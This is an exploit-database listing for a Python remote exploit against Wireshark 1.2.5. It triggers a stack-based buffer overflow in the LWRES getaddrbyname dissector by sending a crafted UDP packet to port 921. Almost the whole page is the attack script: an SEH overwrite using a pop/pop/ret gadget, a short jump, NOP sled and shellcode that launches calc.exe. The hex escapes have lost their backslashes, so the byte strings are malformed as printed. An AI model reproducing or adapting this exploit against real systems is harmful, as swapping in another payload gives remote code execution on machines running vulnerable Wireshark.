[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe
# Published : 2010-02-15
# Author : Nullthreat and Pure|Hate
# Previous Title : Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit
# Next Title : Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit
#!/usr/bin/env python
# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow
# Discovered by babi
# Reference: http://www.exploit-db.com/exploits/11288
# Exploit Dev by Nullthreat & Pure|Hate
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " <host>"
exit(2)
port = 921
addr = (host, port)
leng = 9150
high = int(leng / 256)
low = leng & 255
crash = ("A" * 2128)
# Short jump
jmp = "x90x90x06xeb"
# pop/pop/ret in pcre3 0x61b4121b
ppr = "x1bx12xb4x61"
nop = ("x90" * 24)
# 224 bytes = calc.exe
shellcode = (
"xbfx86x0ax33xa0x2bxc9xdaxd9xd9x74x24xf4xb1"
"x32x5ex31x7ex11x03x7ex11x83xc6x82xe8xc6x5c"
"x62x65x28x9dx72x16xa0x78x43x04xd6x09xf1x98"
"x9cx5cxf9x53xf0x74x8ax16xddx7bx3bx9cx3bxb5"
"xbcx10x84x19x7ex32x78x60x52x94x41xabxa7xd5"
"x86xd6x47x87x5fx9cxf5x38xebxe0xc5x39x3bx6f"
"x75x42x3exb0x01xf8x41xe1xb9x77x09x19xb2xd0"
"xaax18x17x03x96x53x1cxf0x6cx62xf4xc8x8dx54"
"x38x86xb3x58xb5xd6xf4x5fx25xadx0ex9cxd8xb6"
"xd4xdex06x32xc9x79xcdxe4x29x7bx02x72xb9x77"
"xefxf0xe5x9bxeexd5x9dxa0x7bxd8x71x21x3fxff"
"x55x69xe4x9exccxd7x4bx9ex0fxbfx34x3ax5bx52"
"x21x3cx06x39xb4xccx3cx04xb6xcex3ex27xdexff"
"xb5xa8x99xffx1fx8dx55x4ax3dxa4xfdx13xd7xf4"
"x60xa4x0dx3ax9cx27xa4xc3x5bx37xcdxc6x20xff"
"x3dxbbx39x6ax42x68x3axbfx21xefxa8x23xa6xe5"
)
crash2 = ("xcc" * 6752)
data = "x00x00x01x5dx00x00x00x00x4bx49x1cx52x00x01x00x01"
data += "x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00"
data += "x00x00x00x01"
data += chr(high) + chr(low) + crash + jmp + ppr + nop + shellcode + crash2 + "x00x00"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.sendto(data, addr)
except:
print "can't lookup host"
exit(1)
udps.close()
exit(0)